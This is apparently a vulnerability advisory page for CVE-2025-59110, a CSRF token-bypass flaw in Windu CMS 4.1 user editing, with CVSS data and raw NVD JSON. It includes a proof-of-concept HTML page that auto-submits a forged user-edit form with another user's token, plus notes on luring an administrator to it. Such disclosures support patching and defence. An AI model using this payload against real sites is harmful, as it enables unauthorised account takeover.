Security Vulnerability Report
CVE-2025-59110 CVSS 6.5 MEDIUM

CVE-2025-59110

Published: 2025-11-18 15:16:33
Last Modified: 2025-12-05 13:16:03

Description

Windu CMS is vulnerable to Cross-Site Request Forgery (CSRF) in its user editing functionality. The implemented CSRF protection mechanism can be bypassed by using the CSRF token of another user. It is worth noting that registration is open and anyone can create an account. Only version 4.1 was tested and confirmed as vulnerable. This issue was fixed in version 4.1 build 2250.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:* - VULNERABLE
Windu CMS 4.1 (all versions < 4.1 build 2250)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for Windu CMS 4.1 User Edit -->
<html>
<body>
  <h1>Windu CMS 4.1 CSRF Attack PoC</h1>
  <p>Trick a logged-in administrator into visiting this page to modify user information</p>
  <form action="http://target-site.com/index.php?do=user/edit/[TARGET_USER_ID]" method="POST" id="csrfForm">
    <input type="hidden" name="csrf_token" value="[ATTACKER_STOLEN_TOKEN]">
    <input type="hidden" name="username" value="admin">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="role" value="admin">
    <input type="hidden" name="submit" value="1">
  </form>
  <script>
    // Auto-submit form when page loads
    document.getElementById('csrfForm').submit();
  </script>
  <p>If you see this text, the attack failed.</p>
</body>
</html>
<!--
Notes:
1. The attacker first registers an account to obtain a valid CSRF token
2. Replace [ATTACKER_STOLEN_TOKEN] with the obtained token
3. Replace [TARGET_USER_ID] with the target user ID
4. Replace target-site.com with the actual target URL
5. Trick an administrator into visiting this page to trigger the CSRF attack
-->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59110", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:32.620", "lastModified": "2025-12-05T13:16:03.017", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Windu CMS is vulnerable to Cross-Site Request Forgery in user editing functionality. Implemented CSRF protection mechanism can be bypassed by using CSRF token of other user. It is worth noting that the registration is open and anyone can create an account.\n\nOnly version 4.1 was tested and confirmed as vulnerable.\nThis issue was fixed in version 4.1 build 2250."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "614EBC19-889B-4FC0-8937-C52F415D4835"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-59110", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://windu.org/", "source": "[email protected]", "tags": ["Product"]}]}}